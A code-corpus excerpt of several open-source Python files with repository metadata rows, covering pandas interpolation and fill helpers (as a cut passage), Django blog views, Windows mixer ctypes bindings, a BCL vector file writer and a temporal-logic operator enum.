x, new_x = x._values.astype('i8'), new_x.astype('i8')
if method == 'pchip':
try:
alt_methods['pchip'] = interpolate.pchip_interpolate
except AttributeError:
raise ImportError("Your version of Scipy does not support "
"PCHIP interpolation.")
elif method == 'akima':
alt_methods['akima'] = _akima_interpolate
interp1d_methods = ['nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'polynomial']
if method in interp1d_methods:
if method == 'polynomial':
method = order
terp = interpolate.interp1d(x, y, kind=method, fill_value=fill_value,
bounds_error=bounds_error)
new_y = terp(new_x)
elif method == 'spline':
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError("order needs to be specified and greater than 0; "
"got order: {}".format(order))
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This numberincludes the function
value as 0th derivative.
extrapolate : bool, optional
Whether to extrapolate to ouf-of-bounds points based on first and last
intervals, or to return NaNs. Default: True.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1),
orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int or list, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R,
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif interpolate._isscalar(der):
return P(x, der=der)
else:
return [P(x, nu) for nu in der]
def interpolate_2d(values, method='pad', axis=0, limit=None, fill_value=None,
dtype=None):
"""
Perform an actual interpolation of values, values will be make 2-d if
needed fills inplace, returns the result.
"""
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with "
"axis != 0")
values = values.reshape(tuple((1,) + values.shape))
if fill_value is None:
mask = None
else: # todo create faster fill func without masking
mask = mask_missing(transf(values), fill_value)
method = clean_fill_method(method)
if method == 'pad':
values = transf(pad_2d(
transf(values), limit=limit, mask=mask, dtype=dtype))
else:
values = transf(backfill_2d(
transf(values), limit=limit, mask=mask, dtype=dtype))
# reshape back
if ndim == 1:
values = values[0]
return values
def _cast_values_for_fillna(values, dtype):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if (is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype) or
is_timedelta64_dtype(dtype)):
values = values.view(np.int64)
elif is_integer_dtype(values):
# NB: this check needs to come after the datetime64 check above
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None, dtype=None):
# boilerplate for pad_1d, backfill_1d, pad_2d, backfill_2d
if dtype is None:
dtype = values.dtype
if mask is None:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype)
mask = mask.view(np.uint8)
return values, mask
def pad_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.pad_inplace(values, mask, limit=limit)
return values
def backfill_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.backfill_inplace(values, mask, limit=limit)
return values
def pad_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def backfill_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {'pad': pad_1d, 'backfill': backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def fill_zeros(result, x, y, name, fill):
"""
If this is a reversed op, then flip x,y
If we have an integer value (or array in y)
and we have 0's, fill them with the fill,
return the result.
Mask the nan's from x.
"""
if fill is None or is_float_dtype(result):
return result
if name.startswith(('r', '__r')):
x, y = y, x
is_variable_type = (hasattr(y, 'dtype') or hasattr(y, 'type'))
is_scalar_type = is_scalar(y)
if not is_variable_type and not is_scalar_type:
return result
if is_scalar_type:
y = np.array(y)
if is_integer_dtype(y):
if (y == 0).any():
# GH 7325, mask and nans must be broadcastable (also: PR 9308)
# Raveling and then reshaping makes np.putmask faster
mask = ((y == 0) & ~np.isnan(result)).ravel()
shape = result.shape
result = result.astype('float64', copy=False).ravel()
np.putmask(result, mask, fill)
# if we have a fill of inf, then sign it correctly
# (GH 6178 and PR 9308)
if np.isinf(fill):
signs = y if name.startswith(('r', '__r')) else x
signs = np.sign(signs.astype('float', copy=False))
negative_inf_mask = (signs.ravel() < 0) & mask
np.putmask(result, negative_inf_mask, -fill)
if "floordiv" in name: # (PR 9308)
nan_mask = ((y == 0) & (x == 0)).ravel()
np.putmask(result, nan_mask, np.nan)
result = result.reshape(shape)
return result
def mask_zero_div_zero(x, y, result, copy=False):
"""
Set results of 0 / 0 or 0 // 0 to np.nan, regardless of the dtypes
of the numerator or the denominator.
Parameters
----------
x : ndarray
y : ndarray
result : ndarray
copy : bool (default False)
Whether to always create a new array or try to fill in the existing
array if possible.
Returns
-------
filled_result : ndarray
Examples
--------
>>> x = np.array([1, 0, -1], dtype=np.int64)
>>> y = 0 # int 0; numpy behavior is different with float
>>> result = x / y
>>> result # raw numpy result does not fill division by zero
array([0, 0, 0])
>>> mask_zero_div_zero(x, y, result)
array([ inf, nan, -inf])
"""
if is_scalar(y):
y = np.array(y)
zmask = y == 0
if zmask.any():
shape = result.shape
nan_mask = (zmask & (x == 0)).ravel()
neginf_mask = (zmask & (x < 0)).ravel()
posinf_mask = (zmask & (x > 0)).ravel()
if nan_mask.any() or neginf_mask.any() or posinf_mask.any():
# Fill negative/0 with -inf, positive/0 with +inf, 0/0 with NaN
result = result.astype('float64', copy=copy).ravel()
np.putmask(result, nan_mask, np.nan)
np.putmask(result, posinf_mask, np.inf)
np.putmask(result, neginf_mask, -np.inf)
result = result.reshape(shape)
return result
def dispatch_missing(op, left, right, result):
"""
Fill nulls caused by division by zero, casting to a different dtype
if necessary.
Parameters
----------
op : function (operator.add, operator.div, ...)
left : object (Index for non-reversed ops)
right : object (Index fof reversed ops)
result : ndarray
Returns
-------
result : ndarray
"""
opstr = '__{opname}__'.format(opname=op.__name__).replace('____', '__')
if op in [operator.truediv, operator.floordiv,
getattr(operator, 'div', None)]:
result = mask_zero_div_zero(left, right, result)
elif op is operator.mod:
result = fill_zeros(result, left, right, opstr, np.nan)
elif op is divmod:
res0 = mask_zero_div_zero(left, right, result[0])
res1 = fill_zeros(result[1], left, right, opstr, np.nan)
result = (res0, res1)
return result
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = (set(np.where(windowed)[0] + limit) |
set(np.where((~invalid[:limit + 1]).cumsum() == 0)[0]))
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
def _rolling_window(a, window):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
|
bsd-3-clause
| -1,535,343,801,592,295,700
| 31.445667
| 79
| 0.588265
| false
| 3.814977
| false
| false
| false
|
GMadorell/djagolb
|
src/blog/views.py
|
1
|
4684
|
from collections import OrderedDict, Iterable
import pdb
from django.contrib.sites.models import Site
from django.http import Http404
from django.views import generic
from django.views.generic.base import ContextMixin
from .models import BlogPostModel, Author, Tag
class AuthorContextMixin(ContextMixin):
author_model = Author
def get_context_data(self, **kwargs):
context = super(AuthorContextMixin, self).get_context_data(**kwargs)
context["author"] = self.author_model.objects.all()[0]
return context
class SiteContextMixin(ContextMixin):
def get_context_data(self, **kwargs):
context = super(SiteContextMixin, self).get_context_data(**kwargs)
context["site"] = Site.objects.all()[0]
return context
class BlogIndexView(
AuthorContextMixin,
SiteContextMixin,
generic.ListView
):
template_name = "blog/blog_index.html"
model = BlogPostModel
POSTS_PER_PAGE = 3
def get_queryset(self):
self.validate_correct_page()
return self.model.objects.order_by("-posted_at")[
self.get_starting_index():self.get_ending_index()]
def get_context_data(self, **kwargs):
self.validate_correct_page()
context = super(BlogIndexView, self).get_context_data(**kwargs)
context["has_older_posts"] = \
self.get_ending_index() < self.get_amount_posts()
context["has_newer_posts"] = self.get_starting_index() > 0
context["page"] = self.kwargs.get("page")
return context
def validate_correct_page(self):
if self.get_page() < 1:
raise Http404
if self.get_starting_index() > self.get_amount_posts():
raise Http404
def get_page(self):
return int(self.kwargs.get("page"))
def get_amount_posts(self):
return self.model.objects.count()
def get_starting_index(self):
return (self.get_page() - 1) * self.POSTS_PER_PAGE
def get_ending_index(self):
return self.get_starting_index() + self.POSTS_PER_PAGE
class BlogPostDetail(
AuthorContextMixin,
SiteContextMixin,
generic.DetailView,
):
template_name = "blog/blogpost.html"
context_object_name = "blogpost"
model = BlogPostModel
class ArchiveView(
AuthorContextMixin,
generic.TemplateView,
):
template_name = "blog/archive.html"
def get_context_data(self, **kwargs):
context = super(ArchiveView, self).get_context_data(**kwargs)
archive = OrderedDict()
posted_at_values = \
BlogPostModel.objects.order_by("-posted_at") \
.values_list("posted_at", flat=True)
# Make sure values are unique and ordered from high value to lower.
years = sorted(
list(set(map(lambda posted_at: posted_at.year, posted_at_values))),
reverse=True)
for year in years:
year_dic = OrderedDict()
posted_at_year = \
BlogPostModel.objects.filter(posted_at__year=year) \
.order_by("-posted_at") \
.values_list("posted_at", flat=True)
months = sorted(list(
set(map(lambda posted_at: posted_at.month, posted_at_year))),
reverse=True)
for month in months:
month_dic = OrderedDict()
posted_at_year_month = \
BlogPostModel.objects.filter(posted_at__year=year) \
.filter(posted_at__month=month) \
.order_by("-posted_at") \
.values_list("posted_at", flat=True)
days = sorted(list(set(map(lambda posted_at: posted_at.day,
posted_at_year_month))),
reverse=True)
for day in days:
blogposts_at_day = \
BlogPostModel.objects.filter(posted_at__year=year) \
.filter(posted_at__month=month) \
.filter(posted_at__day=day) \
.order_by("-posted_at")
month_dic[day] = list(blogposts_at_day)
year_dic[month] = month_dic
archive[year] = year_dic
context["archive"] = archive
context["test"] = BlogPostModel.objects.all()
return context
class AboutView(
generic.TemplateView,
AuthorContextMixin,
):
template_name = "blog/about.html"
class TagView(
generic.ListView,
AuthorContextMixin,
):
model = Tag
template_name = "blog/tags.html"
context_object_name = "tags"
|
mit
| 9,116,562,323,284,935,000
| 29.415584
| 79
| 0.583262
| false
| 3.982993
| false
| false
| false
|
WoLpH/EventGhost
|
eg/WinApi/Dynamic/Mmsystem.py
|
1
|
11993
|
# -*- coding: utf-8 -*-
#
# This file is part of EventGhost.
# Copyright © 2005-2016 EventGhost Project <http://www.eventghost.net/>
#
# EventGhost is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 2 of the License, or (at your option)
# any later version.
#
# EventGhost is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with EventGhost. If not, see <http://www.gnu.org/licenses/>.
#pylint: disable-msg=C0103,C0301,C0302
# This file gets automatically extended by ctypeslib.dynamic_module, so don't
# edit it yourself.
import sys
# Local imports
from eg.WinApi.Dynamic import *
_Winmm = WinDLL("Winmm")
if __name__ == "__main__":
try:
ctypeslib = __import__("ctypeslib.dynamic_module")
except ImportError:
print "ctypeslib is not installed!"
else:
try:
ctypeslib.dynamic_module.include(
"#define UNICODE\n"
"#define _WIN32_WINNT 0x500\n"
"#define WIN32_LEAN_AND_MEAN\n"
"#define NO_STRICT\n"
"#include <windows.h>\n"
"#include <Mmsystem.h>\n"
)
except WindowsError:
print "GCC_XML most likely not installed"
#-----------------------------------------------------------------------------#
# everything after the following line is automatically created
#-----------------------------------------------------------------------------#
MIXERCONTROL_CT_CLASS_MASK = 4026531840L # Variable c_ulong '-268435456ul'
MIXERCONTROL_CT_CLASS_FADER = 1342177280 # Variable c_long '1342177280l'
MIXERCONTROL_CONTROLTYPE_VOLUME = 1342373889 # Variable c_long '1342373889l'
MIXERCONTROL_CONTROLTYPE_BASS = 1342373890 # Variable c_long '1342373890l'
MIXERCONTROL_CONTROLTYPE_TREBLE = 1342373891 # Variable c_long '1342373891l'
MIXERCONTROL_CONTROLTYPE_EQUALIZER = 1342373892 # Variable c_long '1342373892l'
MIXERCONTROL_CONTROLTYPE_FADER = 1342373888 # Variable c_long '1342373888l'
MIXERCONTROL_CT_CLASS_LIST = 1879048192 # Variable c_long '1879048192l'
MIXERCONTROL_CONTROLTYPE_SINGLESELECT = 1879113728 # Variable c_long '1879113728l'
MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT = 1895890944 # Variable c_long '1895890944l'
MIXERCONTROL_CONTROLTYPE_MUX = 1879113729 # Variable c_long '1879113729l'
MIXERCONTROL_CONTROLTYPE_MIXER = 1895890945 # Variable c_long '1895890945l'
MIXERCONTROL_CT_CLASS_METER = 268435456 # Variable c_long '268435456l'
MIXERCONTROL_CONTROLTYPE_BOOLEANMETER = 268500992 # Variable c_long '268500992l'
MIXERCONTROL_CONTROLTYPE_PEAKMETER = 268566529 # Variable c_long '268566529l'
MIXERCONTROL_CONTROLTYPE_SIGNEDMETER = 268566528 # Variable c_long '268566528l'
MIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER = 268632064 # Variable c_long '268632064l'
MIXERCONTROL_CT_CLASS_NUMBER = 805306368 # Variable c_long '805306368l'
MIXERCONTROL_CONTROLTYPE_SIGNED = 805437440 # Variable c_long '805437440l'
MIXERCONTROL_CONTROLTYPE_UNSIGNED = 805502976 # Variable c_long '805502976l'
MIXERCONTROL_CONTROLTYPE_PERCENT = 805634048 # Variable c_long '805634048l'
MIXERCONTROL_CONTROLTYPE_DECIBELS = 805568512 # Variable c_long '805568512l'
MIXERCONTROL_CT_CLASS_SLIDER = 1073741824 # Variable c_long '1073741824l'
MIXERCONTROL_CONTROLTYPE_SLIDER = 1073872896 # Variable c_long '1073872896l'
MIXERCONTROL_CONTROLTYPE_PAN = 1073872897 # Variable c_long '1073872897l'
MIXERCONTROL_CONTROLTYPE_QSOUNDPAN = 1073872898 # Variable c_long '1073872898l'
MIXERCONTROL_CT_CLASS_SWITCH = 536870912 # Variable c_long '536870912l'
MIXERCONTROL_CONTROLTYPE_BOOLEAN = 536936448 # Variable c_long '536936448l'
MIXERCONTROL_CONTROLTYPE_BUTTON = 553713664 # Variable c_long '553713664l'
MIXERCONTROL_CONTROLTYPE_LOUDNESS = 536936452 # Variable c_long '536936452l'
MIXERCONTROL_CONTROLTYPE_MONO = 536936451 # Variable c_long '536936451l'
MIXERCONTROL_CONTROLTYPE_MUTE = 536936450 # Variable c_long '536936450l'
MIXERCONTROL_CONTROLTYPE_ONOFF = 536936449 # Variable c_long '536936449l'
MIXERCONTROL_CONTROLTYPE_STEREOENH = 536936453 # Variable c_long '536936453l'
MIXERCONTROL_CT_CLASS_TIME = 1610612736 # Variable c_long '1610612736l'
MIXERCONTROL_CONTROLTYPE_MICROTIME = 1610809344 # Variable c_long '1610809344l'
MIXERCONTROL_CONTROLTYPE_MILLITIME = 1627586560 # Variable c_long '1627586560l'
MIXERCONTROL_CT_CLASS_CUSTOM = 0 # Variable c_long '0l'
MIXERCONTROL_CONTROLTYPE_CUSTOM = 0 # Variable c_long '0l'
class tMIXERCONTROLDETAILS_UNSIGNED(Structure):
pass
MIXERCONTROLDETAILS_UNSIGNED = tMIXERCONTROLDETAILS_UNSIGNED
tMIXERCONTROLDETAILS_UNSIGNED._pack_ = 1
tMIXERCONTROLDETAILS_UNSIGNED._fields_ = [
('dwValue', DWORD),
]
class tMIXERCONTROLDETAILS_SIGNED(Structure):
pass
MIXERCONTROLDETAILS_SIGNED = tMIXERCONTROLDETAILS_SIGNED
tMIXERCONTROLDETAILS_SIGNED._pack_ = 1
tMIXERCONTROLDETAILS_SIGNED._fields_ = [
('lValue', LONG),
]
class tMIXERCONTROLDETAILS_BOOLEAN(Structure):
pass
MIXERCONTROLDETAILS_BOOLEAN = tMIXERCONTROLDETAILS_BOOLEAN
tMIXERCONTROLDETAILS_BOOLEAN._pack_ = 1
tMIXERCONTROLDETAILS_BOOLEAN._fields_ = [
('fValue', LONG),
]
class tagMIXERCONTROLDETAILS_LISTTEXTW(Structure):
pass
MIXERCONTROLDETAILS_LISTTEXTW = tagMIXERCONTROLDETAILS_LISTTEXTW
MIXERCONTROLDETAILS_LISTTEXT = MIXERCONTROLDETAILS_LISTTEXTW
tagMIXERCONTROLDETAILS_LISTTEXTW._pack_ = 1
tagMIXERCONTROLDETAILS_LISTTEXTW._fields_ = [
('dwParam1', DWORD),
('dwParam2', DWORD),
('szName', WCHAR * 64),
]
MIXERCONTROL_CONTROLF_DISABLED = 2147483648L # Variable c_ulong '-2147483648ul'
MIXERCONTROL_CONTROLF_MULTIPLE = 2 # Variable c_long '2l'
MIXERCONTROL_CONTROLF_UNIFORM = 1 # Variable c_long '1l'
MMSYSERR_NOERROR = 0 # Variable c_int '0'
class tagMIXERCAPSW(Structure):
pass
MIXERCAPSW = tagMIXERCAPSW
MIXERCAPS = MIXERCAPSW
MMVERSION = UINT
tagMIXERCAPSW._pack_ = 1
tagMIXERCAPSW._fields_ = [
('wMid', WORD),
('wPid', WORD),
('vDriverVersion', MMVERSION),
('szPname', WCHAR * 32),
('fdwSupport', DWORD),
('cDestinations', DWORD),
]
class tagMIXERLINEW(Structure):
pass
MIXERLINEW = tagMIXERLINEW
MIXERLINE = MIXERLINEW
class N13tagMIXERLINEW5DOLLAR_112E(Structure):
pass
N13tagMIXERLINEW5DOLLAR_112E._pack_ = 1
N13tagMIXERLINEW5DOLLAR_112E._fields_ = [
('dwType', DWORD),
('dwDeviceID', DWORD),
('wMid', WORD),
('wPid', WORD),
('vDriverVersion', MMVERSION),
('szPname', WCHAR * 32),
]
tagMIXERLINEW._pack_ = 1
tagMIXERLINEW._fields_ = [
('cbStruct', DWORD),
('dwDestination', DWORD),
('dwSource', DWORD),
('dwLineID', DWORD),
('fdwLine', DWORD),
('dwUser', DWORD_PTR),
('dwComponentType', DWORD),
('cChannels', DWORD),
('cConnections', DWORD),
('cControls', DWORD),
('szShortName', WCHAR * 16),
('szName', WCHAR * 64),
('Target', N13tagMIXERLINEW5DOLLAR_112E),
]
class tagMIXERCONTROLW(Structure):
pass
MIXERCONTROLW = tagMIXERCONTROLW
MIXERCONTROL = MIXERCONTROLW
class N16tagMIXERCONTROLW5DOLLAR_117E(Union):
pass
class N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E(Structure):
pass
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E._fields_ = [
('lMinimum', LONG),
('lMaximum', LONG),
]
class N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E(Structure):
pass
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E._fields_ = [
('dwMinimum', DWORD),
('dwMaximum', DWORD),
]
N16tagMIXERCONTROLW5DOLLAR_117E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_117E._anonymous_ = ['_0', '_1']
N16tagMIXERCONTROLW5DOLLAR_117E._fields_ = [
('_0', N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E),
('_1', N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E),
('dwReserved', DWORD * 6),
]
class N16tagMIXERCONTROLW5DOLLAR_120E(Union):
pass
N16tagMIXERCONTROLW5DOLLAR_120E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_120E._fields_ = [
('cSteps', DWORD),
('cbCustomData', DWORD),
('dwReserved', DWORD * 6),
]
tagMIXERCONTROLW._pack_ = 1
tagMIXERCONTROLW._fields_ = [
('cbStruct', DWORD),
('dwControlID', DWORD),
('dwControlType', DWORD),
('fdwControl', DWORD),
('cMultipleItems', DWORD),
('szShortName', WCHAR * 16),
('szName', WCHAR * 64),
('Bounds', N16tagMIXERCONTROLW5DOLLAR_117E),
('Metrics', N16tagMIXERCONTROLW5DOLLAR_120E),
]
class tagMIXERLINECONTROLSW(Structure):
pass
MIXERLINECONTROLSW = tagMIXERLINECONTROLSW
MIXERLINECONTROLS = MIXERLINECONTROLSW
class N21tagMIXERLINECONTROLSW5DOLLAR_122E(Union):
pass
N21tagMIXERLINECONTROLSW5DOLLAR_122E._pack_ = 1
N21tagMIXERLINECONTROLSW5DOLLAR_122E._fields_ = [
('dwControlID', DWORD),
('dwControlType', DWORD),
]
LPMIXERCONTROLW = POINTER(tagMIXERCONTROLW)
tagMIXERLINECONTROLSW._pack_ = 1
tagMIXERLINECONTROLSW._anonymous_ = ['_0']
tagMIXERLINECONTROLSW._fields_ = [
('cbStruct', DWORD),
('dwLineID', DWORD),
('_0', N21tagMIXERLINECONTROLSW5DOLLAR_122E),
('cControls', DWORD),
('cbmxctrl', DWORD),
('pamxctrl', LPMIXERCONTROLW),
]
class tMIXERCONTROLDETAILS(Structure):
pass
MIXERCONTROLDETAILS = tMIXERCONTROLDETAILS
class N20tMIXERCONTROLDETAILS5DOLLAR_123E(Union):
pass
N20tMIXERCONTROLDETAILS5DOLLAR_123E._pack_ = 1
N20tMIXERCONTROLDETAILS5DOLLAR_123E._fields_ = [
('hwndOwner', HWND),
('cMultipleItems', DWORD),
]
tMIXERCONTROLDETAILS._pack_ = 1
tMIXERCONTROLDETAILS._anonymous_ = ['_0']
tMIXERCONTROLDETAILS._fields_ = [
('cbStruct', DWORD),
('dwControlID', DWORD),
('cChannels', DWORD),
('_0', N20tMIXERCONTROLDETAILS5DOLLAR_123E),
('cbDetails', DWORD),
('paDetails', LPVOID),
]
HMIXER = HANDLE
MMRESULT = UINT
LPHMIXER = POINTER(HMIXER)
mixerOpen = _Winmm.mixerOpen
mixerOpen.restype = MMRESULT
mixerOpen.argtypes = [LPHMIXER, UINT, DWORD_PTR, DWORD_PTR, DWORD]
LPMIXERCAPSW = POINTER(tagMIXERCAPSW)
mixerGetDevCapsW = _Winmm.mixerGetDevCapsW
mixerGetDevCapsW.restype = MMRESULT
mixerGetDevCapsW.argtypes = [UINT_PTR, LPMIXERCAPSW, UINT]
mixerGetDevCaps = mixerGetDevCapsW # alias
HMIXEROBJ = HANDLE
LPMIXERLINEW = POINTER(tagMIXERLINEW)
mixerGetLineInfoW = _Winmm.mixerGetLineInfoW
mixerGetLineInfoW.restype = MMRESULT
mixerGetLineInfoW.argtypes = [HMIXEROBJ, LPMIXERLINEW, DWORD]
mixerGetLineInfo = mixerGetLineInfoW # alias
LPMIXERLINECONTROLSW = POINTER(tagMIXERLINECONTROLSW)
mixerGetLineControlsW = _Winmm.mixerGetLineControlsW
mixerGetLineControlsW.restype = MMRESULT
mixerGetLineControlsW.argtypes = [HMIXEROBJ, LPMIXERLINECONTROLSW, DWORD]
mixerGetLineControls = mixerGetLineControlsW # alias
LPMIXERCONTROLDETAILS = POINTER(tMIXERCONTROLDETAILS)
mixerGetControlDetailsW = _Winmm.mixerGetControlDetailsW
mixerGetControlDetailsW.restype = MMRESULT
mixerGetControlDetailsW.argtypes = [HMIXEROBJ, LPMIXERCONTROLDETAILS, DWORD]
mixerGetControlDetails = mixerGetControlDetailsW # alias
MIXER_GETLINEINFOF_DESTINATION = 0 # Variable c_long '0l'
MIXER_GETLINEINFOF_SOURCE = 1 # Variable c_long '1l'
MIXER_GETLINECONTROLSF_ALL = 0 # Variable c_long '0l'
MIXER_GETLINECONTROLSF_ONEBYID = 1 # Variable c_long '1l'
MIXER_GETCONTROLDETAILSF_VALUE = 0 # Variable c_long '0l'
MIXER_GETCONTROLDETAILSF_LISTTEXT = 1 # Variable c_long '1l'
mixerGetNumDevs = _Winmm.mixerGetNumDevs
mixerGetNumDevs.restype = UINT
mixerGetNumDevs.argtypes = []
mixerSetControlDetails = _Winmm.mixerSetControlDetails
mixerSetControlDetails.restype = MMRESULT
mixerSetControlDetails.argtypes = [HMIXEROBJ, LPMIXERCONTROLDETAILS, DWORD]
MIXERLINE_COMPONENTTYPE_DST_SPEAKERS = 4 # Variable c_long '4l'
MIXER_GETLINEINFOF_COMPONENTTYPE = 3 # Variable c_long '3l'
MIXER_GETLINECONTROLSF_ONEBYTYPE = 2 # Variable c_long '2l'
|
gpl-2.0
| -8,111,707,828,437,590,000
| 38.973333
| 85
| 0.737241
| false
| 2.882
| false
| false
| false
|
decarboxy/py_protein_utils
|
rosettautil/bcl/file_formats.py
|
1
|
1538
|
from rosettautil.util import fileutil
import sys
class list_of_2D_vectors:
def __init__(self):
self.records = []
def add_record(self, first_col,second_col):
self.records.append((first_col,second_col))
def write_bcl_file(self,path):
out_file = fileutil.universal_open(path,'w')
list_header ="bcl::storage::List<bcl::storage::VectorND2<bcl::math::Vector<double>>>"
vector_header = "bcl::storage::VectorND2<bcl::math::Vector<double>>"
double_header = "bcl::math::Vector<double>"
out_file.write(list_header+"\n")
out_file.write(str(len(self.records))+"\n")
for first_col, second_col in self.records:
out_file.write(vector_header+"\n")
out_file.write(double_header+"\n")
out_file.write(str(1)+"\n")
out_file.write(str(first_col)+"\n")
out_file.write(double_header+"\n")
out_file.write(str(1)+"\n")
out_file.write(str(second_col)+"\n")
out_file.close()
def read_bcl_file(self,path):
print "This function doesn't work yet"
sys.exit()
out_file = fileutil.universal_open(path,'r')
list_header ="bcl::storage::List<bcl::storage::VectorND2<bcl::math::Vector<double>>>"
vector_header = "bcl::storage::VectorND2<bcl::math::Vector<double>>"
double_header = "bcl::math::Vector<double>"
list_scope = False
vector_scope = False
double_scope = False
|
mit
| 748,329,537,673,460,700
| 37.475
| 93
| 0.576723
| false
| 3.402655
| false
| false
| false
|
hkff/AccLab
|
pyAAL/FOTLOperators.py
|
1
|
1135
|
"""
FOTLOperators
Copyright (C) 2014 Walid Benghabrit
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'walid'
from enum import Enum
# FOTL operators
class FOTLOperators(Enum):
"""
Fotl operators in tspass syntax
"""
t_equal = '='
t_not = '~'
t_and = '&'
t_or = '|'
t_implication = '=>'
t_equivalence = '<=>'
t_forall = '!'
t_exists = '?'
t_always = 'always'
t_next = 'next'
t_sometime = 'sometime'
t_until = 'until'
t_unless = 'unless'
def __str__(self):
return self.value
|
gpl-3.0
| -7,398,909,174,859,723,000
| 25.395349
| 69
| 0.671366
